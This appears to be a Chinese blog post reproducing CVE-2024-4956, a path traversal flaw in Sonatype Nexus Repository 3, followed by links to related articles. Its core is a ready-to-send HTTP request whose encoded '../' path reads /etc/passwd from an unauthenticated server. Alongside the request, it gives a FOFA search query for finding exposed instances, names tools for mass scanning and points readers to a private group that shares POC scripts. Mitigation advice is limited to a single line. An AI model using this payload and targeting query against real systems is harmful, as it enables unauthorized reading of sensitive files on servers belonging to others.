【漏洞复现】Sonatype Nexus Repository 路径遍历漏洞(CVE-2024-4956)

已于 2024-05-23 22:34:41 修改
阅读量662 收藏 5
点赞数 15
分类专栏: 漏洞复现篇 文章标签: Sonatype
于 2024-05-23 22:32:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139159175
版权

0x01 产品简介

Sonatype Nexus Repository 是美国Sonatype公司的一款存储库管理器,用于存储和分发软件组件、构建工件和 Docker 容器。它支持多种包格式,与 CI/CD 工具集成,并提供安全性和合规性功能。

0x02 漏洞概述

Sonatype Nexus Repository3 存在路径遍历漏洞(CVE-2024-4956),未经身份认证的远程攻击者通过构造特殊的请求可以下载读取远程目标系统上的任意文件,对机密性造成很高的影响。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议客户尽快做好自查及防护。

0x03 搜索语法

FOFA: app="Nexus-Repository-Manager"

在这里插入图片描述

0x04 漏洞复现

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 15
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Sonatype Nexus Repository 3 路径遍历漏洞复现(CVE-2024-4956)
0xSec
05-23 832
2024年5月,Nexus Repository官方Sonatype发布了新补丁,修复了一处路径穿越漏洞CVE-2024-4956。经分析,该漏洞可以通过特定的路径请求来未授权访问系统文件,进而可能导致信息泄露。该漏洞无前置条件且利用简单,建议受影响的客户尽快修复漏洞
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 541
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
Nexus Repository Manager 3 远程命令执行漏洞 CVE-2019-7238 漏洞复现
MDSEC的博客
08-18 295
​ SNexus Repository Manager 3 是一款软件仓库,可以用来存储和分发Maven、NuGET等软件源仓库。其3.14.0及之前版本中,存在一处基于OrientDB自定义函数的任意JEXL表达式执行功能,而这处功能存在未授权访问漏洞,将可以导致任意命令执行漏洞。然后在虚拟机上检验是否成功。这样漏洞复现就完成了。微信公众号:猫蛋儿安全。
Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956
渗透安全Sec
05-24 622
Sonatype Nexus Repository 3目录穿越-文件下载漏洞-CVE-2024-4956
【已复现】Sonatype Nexus Repository 3 路径遍历漏洞(CVE-2024-4956)安全风险通告
smellycat000的专栏
05-23 97
●点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Sonatype Nexus Repository 3 路径遍历漏洞漏洞编号QVD-2024-18749,CVE-2024-4956公开时间2024-05-16影响量级十万级奇安信评级高危CVSS 3.1分数7.5威胁类型信息泄露利用可能性高POC状态已公开在野利用状态未发现EXP状态已公开技术细节状态已公开危害描述:未经身份认证的远程攻...
Nexus:Windows 安装 Sonatype Nexus Repository
KissedBySnow的博客
04-09 1485
这里写自定义目录标题Windows下Nexus的安装与使用Nexus的下载Nexus的安装Nexus的启动在pom.xml中使用distributionManagement将项目打包上传到nexus私服 Windows下Nexus的安装与使用 Windows下Sonatype Nexus Repository的安装与使用 Nexus的下载 Nexus下载地址:https://www.sonatyp...
maven私服配置(sonatype nexus repository)添加私包及本地配置
热门推荐
zhangxitab的博客
08-29 1万+
一:下载地址 http://www.sonatype.org/nexus/go 根据自已的操作系统下载适合的版本(这里是oss 3.13.0-01) 二、安装nexus(略) 三、配值代理                添加一个代理仓库   我们创建maven代理maven2 proxy (hosted:本地jar包类,group为分组类) 本地代理仓库的名字:test,远...
Sonatype Nexus3 Repository Manager 搭建 npm 私服
mrhaoxiaojun的博客
12-28 3574
文章目录Sonatype Nexus3 Repository Manager 搭建 npm 私服下载安装windowsLinux添加npm仓库0、重要关系含义1、点击Create repository创建仓库2、再次点击Create repository3、第三次点击Create repository配置与验证npm仓库1、设置nodejs的默认仓库地址2、验证发布包到私服添加权限认证1、创建nx...
Sonatype Nexus Repository配置搭建
aaawolf11的博客
06-14 512
官网有mac、windows、unix的下载版本,unix在CentOS7.9中可以运行。
从 Sonatype Nexus Repository Manager 迁移到 Artifactory
orangeandlemons的博客
04-25 457
该文件包含由迁移脚本处理的存储库的状态。如果您在 Nexus 3 安装上暂停迁移过程并在稍后恢复,则迁移脚本只会迁移在您暂停该过程后添加的那些存储库和安全实体。如果在 Nexus 2 安装上进行迁移,迁移脚本会迁移 Nexus 存储库中的所有存储库和安全实体,无论它们是否在您暂停迁移过程之前已迁移。该脚本从 Nexus 中获取配置信息,在 Artifactory 中创建相应的存储库,将制品迁移到 Artifactory,并将安全配置迁移到 Artifactory。您可以从此列表中删除不想迁移的存储库。
Nexus Repository Manager 3.28.1-01
10-26
最新版本的 Nexus Repository Manager 3.28.1-01 Nexus是一个强大的Maven仓库管理器,它极大地简化了本地内部仓库的维护和外部仓库的访问。 如果使用了公共的Maven仓库服务器,可以从Maven中央仓库下载所需要的构件...
nexus-oss-on-aws:具有良好架构的AWS上部署Sonatype Nexus Repository OSS
05-02
通过EKS上的Helm部署Sonatype Nexus Repository OSS。 通过EFS CSI驱动程序,PV和PVC使用EFS作为Nexus3数据存储 创建一个专用的S3存储桶作为Nexus3 Blobstore 使用外部DNS在Route53中为入口域名创建记录 使用ACM...
nexus3-oss:安装和配置sonatype nexus3-oss的角色
01-31
角色扮演:Nexus 3 OSS 该角色将安装并配置Nexus Repository Manager OSS版本3.x。 可以通过重新运行角色来更新所有配置,但与相关的设置除外,它们在关系中是不变的。目录注意:从ansible星系站点查看时,TOC链接将...
sonatype-nexus-3.64.0-04-unix
01-17
sonatype-nexus-3.64.0-04-unix 是一个强大的Maven仓库管理器,它极大地简化了自己内部仓库的维护和外部仓库的访问。
nexus-3.37.0-01-win64 - Nexus Repository Manager OSS
12-12
Nexus Repository Manager OSS 由于nexus目前官网上(https://help.sonatype.com/repomanager3/download)已经很难下载了,除非翻墙,故整理了一下目前最新版本的分享一下,有需要的欢迎下载。
使用 Sonatype Nexus3 搭建 Maven 私服、上传依赖、下载依赖
少可爱
08-30 1804
1 下载 Nexus 3https://www.sonatype.com/download-oss-sonatype官网截图 注:Nexus 3 版本的运行需要 jdk1.8 解压得到 2 个文件夹// Nexus 运行时所需要的文件,如启动脚本nexus-3.9.0-01 // Nexus生成的配置文件,日志文件,仓库文件sonatype-work..._sonatype/nexus3。2、本地maven文件setting.xml—>mirrors标签中添加配置。
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
ch258563的博客
06-06 1519
Nexus Repository Manager 3 远程命令执行漏洞CVE-2020-10199)
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1630
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
CVE-2024-4956Nexus Repository 3 路径穿越漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
05-30 117
Sonatype Nexus Repository是美国Sonatype公司的一款存储库管理器,它主要用于管理、存储和分发软件等。 Sonatype Nexus Repository 3.68.1之前版本存在安全漏洞,该漏洞源于存在路径遍历,允许未经身份验证的攻击者读取系统文件。
Sonatype Nexus Repository Manager 怎么执行docker pull
06-08
要在 Sonatype Nexus Repository Manager 中执行 Docker pull,您需要先创建一个 Docker 代理存储库来缓存 Docker 镜像。以下是执行 Docker pull 的步骤: 1. 登录 Sonatype Nexus Repository Manager 并导航到 "Repositories" 页面。 2. 点击 "Create Repository" 按钮并选择 "docker (proxy)" 选项。 3. 输入仓库的相关信息,包括名称、URL 和可选的认证信息。 4. 点击 "Create Repository" 按钮以创建 Docker 代理存储库。 5. 转到 Docker 主机上,并确保已安装 Docker 客户端。 6. 在命令行中输入 "docker login" 命令,并输入您的 Sonatype Nexus Repository Manager 凭据以登录。 7. 使用以下命令拉取 Docker 镜像: ``` docker pull <nexus-url>/<repository-name>/<image-name>:<tag> ``` 其中,"<nexus-url>" 是 Sonatype Nexus Repository Manager 的 URL,"<repository-name>" 是您创建的 Docker 代理存储库的名称,"<image-name>" 是要拉取的 Docker 镜像名称,"<tag>" 是要拉取的 Docker 镜像标签。 例如,以下命令将从名为 "docker-proxy" 的 Docker 代理存储库中拉取 "nginx" 镜像的 "latest" 标签: ``` docker pull http://<nexus-url>/repository/docker-proxy/nginx:latest ``` 请注意,如果您的 Sonatype Nexus Repository Manager 受到防火墙或代理的限制,则可能需要配置 Docker 客户端以使用代理。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值